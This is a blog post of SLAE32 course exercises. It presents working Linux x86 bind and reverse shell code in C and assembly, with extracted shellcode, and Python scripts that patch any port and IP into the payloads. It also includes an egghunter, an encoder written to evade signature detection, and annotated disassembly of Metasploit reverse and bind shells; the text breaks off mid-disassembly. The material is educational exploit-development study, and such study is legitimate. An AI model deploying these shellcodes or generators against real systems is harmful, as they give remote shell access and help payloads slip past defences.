Below are my old blog posts for the SLAE32 ‘certification’.
Task 1: ASM TCP Bind Shell
Requirements:
- Binds to a port
- Executes a shell on incoming connection
- Port should be ’easily’ configurable
I wrote a C bind shell based off of other posts in order to better understand the requirements. In actuality, I wrote multiple as I found better ways of writing the same code, as one does. My final C file is below:
#include <sys/socket.h>
#include <unistd.h>
#include <netinet/in.h>
#include <stdio.h>
int main(void)
{
// Create a struct for the server's listening information
struct sockaddr_in srv_addr;
// As seen in https://www.man7.org/linux/man-pages/man7/ip.7.html
// Set the socket 'family' to AF_INET
// Set the sin_port value to the port number, in network byte order
// Set the s_addr valut to INADDR_ANY, for IP agnostic bind()
srv_addr.sin_family = AF_INET;
srv_addr.sin_port = htons(4444);
srv_addr.sin_addr.s_addr = INADDR_ANY;
// Then, create the socket!
int socketfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
// Now, we need to bind things together
bind( socketfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
// Next, we set the socket to 'listen', and apply a 'backlog' argument to 0
listen( socketfd, 0 );
// Once set to listen, we need to tell the listening socket to accept connections
int newSocket = accept(socketfd, NULL, NULL);
// Set up dup2 for stdin/out/err
dup2(newSocket, 0);
dup2(newSocket, 1);
dup2(newSocket, 2);
// Lastly, we execute /bin/sh
execve( "/bin/sh", NULL, NULL );
}
Now, we can break down the steps necessary for creating a bind shell via ASM. The process can be broken into objectives:
- Create a socket
- Bind said socket
- Set the bound socket to listen
- Set the socket to accept new connections
- Properly redirect input, output and errors
- Execute a shell
Seeing the tasks broken down within the C helped to make the above list, but more than that, allowed me to better understand the data being passed to each function and why. With some objectives to accomplish, I came up with the following code for a bind shell:
global _start
section .text
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
; Push it to the stack for the socket(x,x, protocol) argument, set to IPPRORO_IP (0)
push ecx
; socket(x, type, x) argument, set to SOCK_STREAM (1)
push 0x1
; socket(domain, x, x) argument, set to AF_INET (2)
push 0x2
; set socketcall(x, args) argument to ESP (the start of our args)
; Populate eax with socketcall (0x66)
; set socketcall(call, x) to 1 (sys_socket)
mov ecx, esp
mov al, 0x66
mov bl, 0x1
int 0x80
; Our socket file descriptor should be returned within EAX
mov esi, eax
bind:
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
; set up bind socketcall
mov al, 0x66
mov bl, 2
xor ecx, ecx
; set up the sockaddr struct (2, 4444, 0)
push ecx
push word 0x5C11
push word 0x2
; save the location of the struct
mov edi, esp
; push addrlen (size of sockaddr)
push 16
; push sockaddr pointer
push edi
; push sockfd pointer (loaded from eax earlier)
push esi
; move stack pointer into ecx for args
mov ecx, esp
int 0x80
listen:
; int listen(int sockfd, int backlog)
; set up listen socketcall
mov al, 0x66
mov bl, 4
; push backlog
push 0x5
; push sockfd
push esi
; load args
mov ecx, esp
int 0x80
accept:
; accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
; set up accept socketcall
inc bl
mov al, 0x66
; zero out edx to push nulls
xor edx, edx
; push sockaddr len (0)
push edx
; push sockaddr pointer (0)
push edx
; push sockfd pointer (saved from socket())
push esi
; load args into ecx
mov ecx, esp
int 0x80
; eax contains returned clientfd from accept()
; let's save that out
xchg ebx, eax
xor ecx, ecx
mov cl, 0x2
dup:
; int dup2(int oldfd, int newfd)
; load dup2 into eax
; ecx has our counter for stdin/out/err
mov al, 63
int 0x80
dec ecx
jns dup
shell:
; int execve(const char *pathname, char *const argv[], char *const envp[])
; Zero Out eax for first null (envp) and push to stack
xor eax, eax
push eax
; Now, push the string bin bash onto the stack for argv
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
; Now, need filename pointer
; EZ, pop into EBX
mov ebx, esp
; push another null
push eax
mov edx, esp
push ebx
mov ecx, esp
; Now, set up syscall
mov al, 0xb
int 0x80
It’s not small, clocking in at 111 bytes, but there are no nulls, either. So that’s cool. There are some easy optimizations that could be made and probably 5 bytes or so could be saved within the execve call alone.
$ objdump -d ./bind_shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x31\xdb\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xb0\x66\xb3\x01\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x31\xc9\x51\x66\x68\x11\x5c\x66\x6a\x02\x89\xe7\x6a\x10\x57\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x05\x56\x89\xe1\xcd\x80\xfe\xc3\xb0\x66\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
The next task was to make the port the shell uses easily modifiable. This seemed more straightforward, and I wrote a python script to accept port numbers and spit out the fixed shellcode:
#!/usr/bin/env python
import sys
if len(sys.argv) < 2:
print("[-] Provide a port > 256")
sys.exit()
else:
if int(sys.argv[1]) <= 256:
print("[-] Port needs to be greater than 256 to guarantee sockaddr struct size is accurate and avoid null bytes.\n")
print("If you require a lower port, consider changing the instructions in bind from:")
print("\tpush ecx\n\tpush word 0x5C11\n\tpush word 0x2\n")
print("to:")
print("\tpush ecx\n\tsub esp, 2 ; stack alignment\n\tmov byte [esp], cl ; null\n\tmov byte [esp], 0x65 ; port 100\n\tpush word 0x2\n")
sys.exit()
lport = int(sys.argv[1])
def fixPort(lport):
p = hex(lport)[2:]
psize = len(str(p))
if psize == 1 or psize == 3:
p = "0" + p
psize = len(str(p))
if psize == 2:
fport = '\\x' + str(p)[0:2]
else:
fport = '\\x' + str(p)[0:2] + '\\x' + str(p)[2:4]
if "\\x00" in fport:
print("[!] Port conversion contains a null byte, I'm lazy, so choose another port maybe?")
sys.exit()
else:
return fport
port = fixPort(lport)
print("[+] Fixed port: " + port)
shellcode = ""
shellcode += "\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\x6a\\x01\\x6a"
shellcode += "\\x02\\x89\\xe1\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89"
shellcode += "\\xc6\\xb0\\x66\\xb3\\x02\\x31\\xc9\\x51\\x66\\x68"
shellcode += port
shellcode += "\\x66\\x6a\\x02\\x89\\xe7\\x6a\\x10\\x57"
shellcode += "\\x56\\x89\\xe1\\xcd\\x80\\xb0\\x66\\xb3\\x04\\x6a"
shellcode += "\\x05\\x56\\x89\\xe1\\xcd\\x80\\xfe\\xc3\\xb0\\x66"
shellcode += "\\x31\\xd2\\x52\\x52\\x56\\x89\\xe1\\xcd\\x80\\x93"
shellcode += "\\x31\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80\\x49\\x79"
shellcode += "\\xf9\\x31\\xc0\\x50\\x68\\x62\\x61\\x73\\x68\\x68"
shellcode += "\\x62\\x69\\x6e\\x2f\\x68\\x2f\\x2f\\x2f\\x2f\\x89"
shellcode += "\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd"
shellcode += "\\x80"
print("")
print("[+] Shellcode:\n" + shellcode)
This script just accepts a port as an argument, then writes it in the \x format to the shellcode. If the provided port is less than or equal to 256, I suggest replacement instructions in order to keep the sockaddr struct valid, as a single byte port will throw off our size, and a port such as 512 would result in 0x2000, which has a null byte. I saw a few fixes people made that were clever– a template nasm file for instance, but rather than do all that, we can keep it simple. If people really need to be binding to privileged ports, they can with a very small amount of additional work.
$ ./portGen.py 4444
[+] Fixed port: \x11\x5c
[+] Shellcode:
\x31\xc0\x31\xdb\x31\xc9\x51\x6a\x01\x6a\x02\x89\xe1\xb0\x66\xb3\x01\xcd\x80\x89\xc6\xb0\x66\xb3\x02\x31\xc9\x51\x66\x68\x11\x5c\x66\x6a\x02\x89\xe7\x6a\x10\x57\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x05\x56\x89\xe1\xcd\x80\xfe\xc3\xb0\x66\x31\xd2\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
After dropping it into shellcode.c and compiling, here’s the output:
$ ./shellcode &
[1] 73667
$ Shellcode Length: 111
$ nc -v localhost 4444
localhost [127.0.0.1] 4444 (?) open
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),128(lpadmin),132(scanner)
^C
[1]+ Done ./shellcode
Task 2: ASM TCP Rev Shell
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#define rhost "127.0.0.1"
#define rport "4444"
int main(int argc, char *argv[])
{
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in sa;
sa.sin_family = AF_INET;
sa.sin_port = htons(rport);
inet_pton(AF_INET, rhost, &sa.sin_addr.s_addr);
connect(sock, (struct sockaddr *)&sa, sizeof(struct sockaddr_in));
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execve("/bin/sh", 0, 0);
}
Requirements:
- Create a socket
- Call connect
- Create file descriptors
- Call execve
Surprisingly, a reverse shell is a bit simpler, and tends to be smaller than our bind couterpart. Without much optimization, this shellcode clocks in at 87 bytes, pretty good for a noob. It also doesn’t contain any null bytes.
global _start
section .text
_start:
; int socketcall(int call, unsigned long *args)
; socketcall is syscall 102, or 0x66
; socket = 0x1
xor eax, eax
xor ebx, ebx
mov al, 0x66
; int socket(int domain, int type, int protocol)
push ebx
push 0x1
push 0x2
; set up args for socketcall
mov ecx, esp
inc bl
int 0x80
; save the file descriptor returned by socket()
mov edi, eax
connect:
; int socketcall(int call, unsigned long *args)
; Again, 0x66 for socketcall
mov al, 0x66
; increase ebx to get 2 for AF_INET
inc ebx
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
; First, we need to create the sockaddr struct
push 0x0101017f
push word 0x5C11
push word bx
; save the address of sockaddr
mov esi, esp
; Now, let's push the addrlen (16)
push 0x10
; Gotta push the sockaddr pointer now
push esi
; Lastly, we need the socket file descriptor returned from
push edi
; now, set up the right args for socketcall
mov ecx, esp
inc ebx
int 0x80
; save the socketfd, zero and add two to ecx for dup2 loop
xchg ebx, edi
xor ecx, ecx
mov cl, 0x2
dup:
; int dup2(int oldfd, int newfd)
mov al, 63
int 0x80
dec ecx
jns dup
shell:
; int execve(const char *pathname, char *const argv[], char *const envp[])
; Zero Out eax for first null (envp) and push to stack
xor eax, eax
push eax
; Now, push the string bin bash onto the stack for argv
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
; Now, need filename
; EZ, pop into EBX
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
; Now, set up syscall
mov al, 0xb
int 0x80
Objdump output:
$ objdump -d ./reverse_shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x31\xdb\xb0\x66\x53\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xcd\x80\x89\xc7\xb0\x66\x43\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x53\x89\xe6\x6a\x10\x56\x57\x89\xe1\x43\xcd\x80\x87\xdf\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
Plugging that into shellcode.c works as expected. The next step is creating a wrapper script, similar to the python portGen from Task 1, in order to configure the port and IP at will. I took the portGen.py code and modified it very slightly to add an additional method which converts a provided IP address into hexadecimal format. This is then plugged in to the same location the IP bytes normally go. Since IP addresses are defined with octets, each ranging from 0-255, we don’t need to worry about size discrepancies at all.
#!/usr/bin/env python
import sys
import socket
import binascii
if len(sys.argv) < 3:
print("[-] Provide a port (> 256) and IP address")
sys.exit()
else:
if int(sys.argv[1]) <= 256:
print("[-] Port needs to be greater than 256 to guarantee sockaddr struct size is accurate and avoid null bytes.\n")
print("If you require a lower port, consider changing the instructions in connect from:")
print("\tpush 0x0101017f\n\tpush word 0x5C11\n\tpush word bx\n")
print("to:")
print("\txor ecx, ecx\n\tpush 0x0101017f\n\tsub esp, 2 ; stack alignment\n\tmov byte [esp], cl ; null\n\tmov byte [esp], 0x65 ; port 100\n\tpush word 0x2\n")
sys.exit()
lport = int(sys.argv[1])
ip = sys.argv[2]
def ip2Hex(ip):
ipHex = ""
for b in ip.split('.'):
ipHex += "\\x%02x" % (int(b))
return ipHex
def setPort(lport):
p = hex(lport)[2:]
psize = len(str(p))
if psize == 1 or psize == 3:
p = "0" + p
psize = len(str(p))
if psize == 2:
fport = '\\x' + str(p)[0:2]
else:
fport = '\\x' + str(p)[0:2] + '\\x' + str(p)[2:4]
if "\\x00" in fport:
print("[!] Port conversion contains a null byte, I'm lazy, so choose another port maybe?")
sys.exit()
else:
return fport
port = setPort(lport)
ipHex = ip2Hex(ip)
print("[+] Hex port: " + port)
print("[+] Hex ip: " + ipHex)
shellcode = ""
shellcode += "\\x31\\xc0\\x31\\xdb\\xb0\\x66\\x53\\x6a\\x01\\x6a"
shellcode += "\\x02\\x89\\xe1\\xfe\\xc3\\xcd\\x80\\x89\\xc7\\xb0"
shellcode += "\\x66\\x43\\x68"
shellcode += ipHex # IP
shellcode += "\\x66\\x68"
shellcode += port # PORT
shellcode += "\\x66\\x53\\x89\\xe6\\x6a\\x10\\x56\\x57\\x89"
shellcode += "\\xe1\\x43\\xcd\\x80\\x87\\xdf\\x31\\xc9\\xb1\\x02"
shellcode += "\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\x50"
shellcode += "\\x68\\x62\\x61\\x73\\x68\\x68\\x62\\x69\\x6e\\x2f"
shellcode += "\\x68\\x2f\\x2f\\x2f\\x2f\\x89\\xe3\\x50\\x89\\xe2"
shellcode += "\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80"
print("[+] Shellcode: \n" + shellcode)
Pretty slick!
$ ./revshell_Config.py 4444 127.1.1.1
[+] Hex port: \x11\x5c
[+] Hex ip: \x7f\x01\x01\x01
[+] Shellcode:
\x31\xc0\x31\xdb\xb0\x66\x53\x6a\x01\x6a\x02\x89\xe1\xfe\xc3\xcd\x80\x89\xc7\xb0\x66\x43\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x53\x89\xe6\x6a\x10\x56\x57\x89\xe1\x43\xcd\x80\x87\xdf\x31\xc9\xb1\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Task 3: Egghunters!
There’s a lot of information out there on the web about egghunters, and some really good papers too (SKAPE). If you’re totally unfamiliar and just want the tldr, here’s the gist of it:
Let’s say you are testing some sort of server application, maybe it’s an FTP app. The application has a couple different commands that accept some input, but when you send certain data to one of the commands, the application crashes in a way that allows you to control the flow of execution. “Hooray!” you might be thinking, “Now I can send my payload!”
To your dismay, after sending payload after payload you find you can only fit a measly 40 bytes in memory through this vulnerable command, womp womp. Earlier while fuzzing, you noticed you could send arbitrarily large amounts of bytes in the other commands though, then send your payload and take control of execution. There’s a high probability the other thousand \x41’s you sent right before invoking the crash are hanging out in memory, though… but where? Will that even matter?
This is where an egghunter comes in. An egghunter acts as a small piece of code which searches through arbitrary memory locations for a specific, unique string we define, known as an egg. Once it locates the egg, a good egghunter will check the bytes following the intial egg for another egg. If it doesn’t find the egg twice, it continues to search memory, looking for the two eggs in a row. Assuming we prepend our shellcode with our egg, if the egghunter locates two eggs, which again, are expected to be unique values, then it returns the location it found.
Now, since our shellcode is prepended with the two unique eggs, the egghunter has found our shellcode in memory, and we’re free to jump to it and begin execution.
global _start
section .text
_start:
; zero edx for kicks
xor edx, edx
fix_page:
; This is a hacky fix for page sizes
; 0xfff is 4095, so we inc edx later on to avoid nulls
; page fix is only called if we need some gud gud memory
or dx, 0xfff
egghunter:
inc edx
; int access(const char *pathname, int mode)
; Give ebx an arbitrary address within the page
lea ebx, [edx + 4]
; push, pop, syscall for access()
push dword 0x21
pop eax
int 0x80
; compare access() return for errors
; fix the page and get to gud gud memory
; but only if we got bad memory (f2 = EFAULT) :[
cmp al, 0xf2
je fix_page
; if not, load our egg into eax
mov eax, 0x41414141
; load the memory to scan into edi
mov edi, edx
; Scan it, jump to egghunter if no match
scasd
jnz egghunter
; Do that again, just to be sure
scasd
jnz egghunter
; If we got here, it's valid!
jmp edi
Task 4: Encoders
For this task, I decided to start with a simple ROT cipher as we’re simply trying to avoid signature based detections. In python, that might look like this:
>>> input = 1
>>> rotate = 13
>>> out = input + rotate
>>> print(out)
14
That’s pretty… expected, haha. Translated to asm, that’s still very simple and there’s a number of ways to accomplish it depending on your needs. Here’s a rather verbose, easily understood version using write():
global _start
section .text
_start:
xor eax, eax
mul ebx
push ebx
mov bl, 0x1
mov al, 0x04 ; write()
add:
mov ecx, value
add byte [ecx], 0x0C
mov edx, 0x01
int 0x80
storage:
value: db 0x29
Again, pretty simple. In this case, we get a value of ‘5’ returned by the application, which is 0x35, or 0x29 + 0x0C. We know our processor works, great!
Although encoded, a ROT cipher is pretty boring. As I was searching around and seeing how other encoders had been implemented, I found a ROT cipher with a twist. Since we’re working with bytes, in order to prevent an overflow, such as ROT13(0xFA) which would equal 0x107, we can perform a check to see if the value is going to be greater than 256. If so, we can instead subtract from the value. This isn’t strictly necessary since we’re working with lower register values, but it does add a layer of obscurity to the encoder.
For example:
ROT13(0xFA) = 0x107 0x107 - 0x0D = 0xFA
In assembly, we can effectively just ignore the overflow by dealing only with lower register values (e.g. al, bl), but I thought this would be a good exercise. In order to add my own spice to the equation, I also added a bitwise NOT to the encoder and decoder, so the encoder will add or subtract the provided value, then bitwise NOT the result. The decoder will then perform a bitwise NOT and add or subtract the value, depending on whether or not the ‘overflow’ condition would be met.
Here’s the python script I came up with:
#!/usr/bin/python
import sys
# ROT X + NOT encoder / decoder
if len(sys.argv) < 2:
print("[!] Provide a shift")
sys.exit()
else:
shellcode = ("\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
# Set up a few variables for use in our loop
orig = ""
encoded = bytearray()
encodedOut1 = ""
encodedOut2 = ""
encodedOut3 = ""
encoded2 = ""
# We can't let the bytes become bigger than 256 minus the value we add!
addVal = int(sys.argv[1])
maxVal = 256 - addVal
# Create a loop to encode our shellcode
for byte in bytearray(shellcode):
# For sanity, we'll print out the original shellcode
orig += '\\x%02x' % (byte & 0xff)
# Check how big the byte is, if it's going to be larger than the
# maxVal, we need to account for it (otherwise it's bigger than a byte)
if (byte < maxVal):
tmp = (~(byte + addVal))&0xff
encodedOut1 += '\\x%02x' % (tmp)
encodedOut2 += '%02x' % (tmp)
encodedOut3 += '0x%02x,' % (tmp)
encoded.append(tmp)
else:
tmp = (~(addVal - maxVal + byte))&0xff
encodedOut1 += '\\x%02x' % (tmp)
encodedOut2 += '%02x' % (tmp)
encodedOut3 += '0x%02x,' % (tmp)
encoded.append(tmp)
# Simple decoder
# Does the inverse of above
for byte in bytearray(encoded):
if (byte < maxVal):
tmp = (~byte - addVal)&0xff
encoded2 += '\\x%02x' % (tmp)
else:
tmp = (addVal + maxVal - ~byte)&0xff
encoded2 += '\\x%02x' % (tmp)
l1 = len(bytearray(shellcode))
print("Original shellcode (%s bytes): \n%s\n") % (str(l1), orig)
print("Shift %s + NOT Encodings:\n") % (int(addVal))
print("%s\n") % (encodedOut1)
print("0x%s\n") %(encodedOut2)
print("%s\n") % (encodedOut3)
print("Unshift (should be orig): \n%s\n") % (encoded2)
Here’s some sample output:
$ ./encoder.py 12
Original shellcode (30 bytes):
\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Shift 12 + NOT Encodings:
\xc2\x33\xa3\x8b\x91\x92\x80\x8b\x8b\x91\x8a\x85\xc4\x8b\xc4\xc4\xc4\xc4\x6a\x10\xa3\x6a\x11\xa0\x6a\x12\x43\xe8\x26\x73
0xc233a38b9192808b8b918a85c48bc4c4c4c46a10a36a11a06a1243e82673
0xc2,0x33,0xa3,0x8b,0x91,0x92,0x80,0x8b,0x8b,0x91,0x8a,0x85,0xc4,0x8b,0xc4,0xc4,0xc4,0xc4,0x6a,0x10,0xa3,0x6a,0x11,0xa0,0x6a,0x12,0x43,0xe8,0x26,0x73,
Unshift (should be orig):
\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Now, here’s the shellcode I came up with.
global _start
section .text
_start:
; Ye ol' jmpy cally popy
jmp short call_shellcode
decode:
; pop the location of encodedShellcode into EDI
pop edi
xor ecx, ecx
mov cl, len
decoder:
; get the byte in edi into eax
mov al, byte [edi]
; check the size of the byte
cmp al, 0x0A
; If it's less than our shift, jump to rollover
jl short rollover
; not the byte
; sub 10 from it, then replace it
not byte al
sub al, 0x0C
;not byte al
mov [edi], al
jmp short next
rollover:
; We're here because the number is going to rollover if we add to it
; zero ebx, then add FF to it
; add one, to get 100 without nulls
xor ebx, ebx
mov bl, 0xff
inc bx
; just subtract from bl
sub bl, 0x0C
; not the byte
; add the shift and replace it
not byte al
mov esi, eax
add ebx, esi
mov [edi], bl
next:
inc edi
loop decoder
jmp short encodedShellcode
call_shellcode:
call decode
encodedShellcode: db 0xc2,0x33,0xa3,0x8b,0x91,0x92,0x80,0x8b,0x8b,0x91,0x8a,0x85,0xc4,0x8b,0xc4,0xc4,0xc4,0xc4,0x6a,0x10,0xa3,0x6a,0x11,0xa0,0x6a,0x12,0x43,0xe8,0x26,0x73
len: equ $-encodedShellcode
Sure, it’s not the sexiest, but I thought it was pretty clever. Also, there are no nulls, wahoo!
$ objdump -d ./execve-decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x29\x5f\x31\xc9\xb1\x1e\x8a\x07\x3c\x0a\x7c\x08\xf6\xd0\x2c\x0c\x88\x07\xeb\x11\x31\xdb\xb3\xff\x66\x43\x80\xeb\x0c\xf6\xd0\x89\xc6\x01\xf3\x88\x1f\x47\xe2\xde\xeb\x05\xe8\xd2\xff\xff\xff\xc2\x33\xa3\x8b\x91\x92\x80\x8b\x8b\x91\x8a\x85\xc4\x8b\xc4\xc4\xc4\xc4\x6a\x10\xa3\x6a\x11\xa0\x6a\x12\x43\xe8\x26\x73"
Task 5: Disassemble MSF
This task requests students to disassemble and analyze at least three shellcode samples created by metasploit, specifically those under the linux/x86 families. At the time of course creation, the tools msfpayload, msfencode etc had not yet been combined into msfvenom, which is what I’ll obviously use. I decided to perform analysis on the following three payloads:
shell_reverse_tcp (a non-staged reverse shell) shell_bind_tcp (a non-staged bind shell) adduser (a payload for adding a user, duh)
Although not the most unique shellcodes, most other non-meterpreter payloads are, realistically, pretty simple. I chose the two metasploit equivalents of task 1 and 2, to see how a well optimized shellcode can perform similar tasks in fewer bytes.
Let’s start with the first:
shell_reverse_tcp
I went with ndisasm for the analysis of these shellcodes. It works well and takes stdin
$ msfvenom -p linux/x86/shell_reverse_tcp RHOST=192.168.1.1 RPORT=4444 -f raw | ndisasm -u -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
0000000F 93 xchg eax,ebx
00000010 59 pop ecx
00000011 B03F mov al,0x3f
00000013 CD80 int 0x80
00000015 49 dec ecx
00000016 79F9 jns 0x11
00000018 68C0A80110 push dword 0x1001a8c0
0000001D 680200115C push dword 0x5c110002
00000022 89E1 mov ecx,esp
00000024 B066 mov al,0x66
00000026 50 push eax
00000027 51 push ecx
00000028 53 push ebx
00000029 B303 mov bl,0x3
0000002B 89E1 mov ecx,esp
0000002D CD80 int 0x80
0000002F 52 push edx
00000030 686E2F7368 push dword 0x68732f6e
00000035 682F2F6269 push dword 0x69622f2f
0000003A 89E3 mov ebx,esp
0000003C 52 push edx
0000003D 53 push ebx
0000003E 89E1 mov ecx,esp
00000040 B00B mov al,0xb
00000042 CD80 int 0x80
68 bytes… That’s impressive. My greenhorn linux reverse shell came in around 87 bytes, I think. That’s not bad, but at the time I didn’t see many ways to further optimize it. Comparing them now, optimizations are pretty clear.
Breaking down these shellcodes is easy if we separate them by syscalls. Below is the first snippet, until we encounter an int 0x80. The first call is to socketcall, or 0x66.
00000000 31DB xor ebx,ebx ; Zero out ebx
00000002 F7E3 mul ebx ; zero out eax, mul returns the value in eax
00000004 53 push ebx ; push 0 onto the stack for socket() 'protocol' argument [NULL]
00000005 43 inc ebx ; increase ebx to 1
00000006 53 push ebx ; push 1 onto the stack for socket() 'type' argument [SOCK_STREAM]
00000007 6A02 push byte +0x2 ; push 2 onto the stack for socket() 'domain' agument [AF_INET]
00000009 89E1 mov ecx,esp ; move the pointer to the arguments for socketcall into ecx
0000000B B066 mov al,0x66 ; move the syscall 0x66 (102) for socketcall into eax
0000000D CD80 int 0x80 ; make the syscall (ebx contains the value 1, or 'socket()', set at 0x00000005)
The above asm is straightforward, but there are a lot of tricks and optimized register usages. The next bit of code is very clever– I thought my loop for dup2 was well made, and now I see this efficient beast:
0000000F 93 xchg eax,ebx ; socket() returns the file descriptor for the new socket in eax-- xcgh is a single byte less than a mov and is equivalent for this use
00000010 59 pop ecx ; the last thing pushed to the stack was 0x02 at 0x00000007, pop that into ecx for a counter and our first dup2 arg
00000011 B03F mov al,0x3f ; mov the syscall 0x3F (63) into eax
00000013 CD80 int 0x80 ; call dup2, returning into eax on success
00000015 49 dec ecx ; decrement ecx
00000016 79F9 jns 0x11 ; jump back to 0x00000011 if the SF flag is set
The above code acts as a very succint dup2 loop, taking only nine bytes total, and the loop itself eight. Until I read this I didn’t think that you could just rearrange the format of the required calls, but that makes quite a lot of sense now. In retrospect, I wouldn’t have been able to come up with a reason as to why you couldn’t.
This next bit is responsible for calling connect()
00000018 68C0A80110 push dword 0x1001a8c0 ; For the sockaddr struct, this is our IP in hex!
0000001D 680200115C push dword 0x5c110002 ; Also for the sockaddr struct, this is the port!
00000022 89E1 mov ecx,esp ; move the pointer for sockaddr into ecx
00000024 B066 mov al,0x66 ; move the syscall for socketcall() into eax
00000026 50 push eax ; push the sockaddr length onto the stack
00000027 51 push ecx ; push the pointer to sockaddr struct onto the stack
00000028 53 push ebx ; push the socket file descriptor onto the stack
00000029 B303 mov bl,0x3 ; move the connect syscall into ebx
0000002B 89E1 mov ecx,esp ; move the arguments for connect into ecx
0000002D CD80 int 0x80 ; call connect!
This last bit is for actually executing the shell, via our good friend execve
0000002F 52 push edx ; push NULL onto the stack as first arg
00000030 686E2F7368 push dword 0x68732f6e ;
00000035 682F2F6269 push dword 0x69622f2f ; pushing //bin/sh onto the stack (backwards)
0000003A 89E3 mov ebx,esp ; move the pointer to //bin/sh into ebx
0000003C 52 push edx ; push another NULL
0000003D 53 push ebx ; push the address of //bin/sh onto the stack
0000003E 89E1 mov ecx,esp ; move the arguments into ecx
00000040 B00B mov al,0xb ; pass in the execve syscall number
00000042 CD80 int 0x80 ; call execve
There’s nothing exceptionally different about how msf’s shellcodes work, but they’re clearly more well optimized than my reverse shell was.
Next up, a non-staged bind shell.
shell_bind_tcp
$ msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.1 LPORT=4444 -f raw | ndisasm -u -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 78 bytes
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
0000000F 5B pop ebx
00000010 5E pop esi
00000011 52 push edx
00000012 680200115C push dword 0x5c110002
00000017 6A10 push byte +0x10
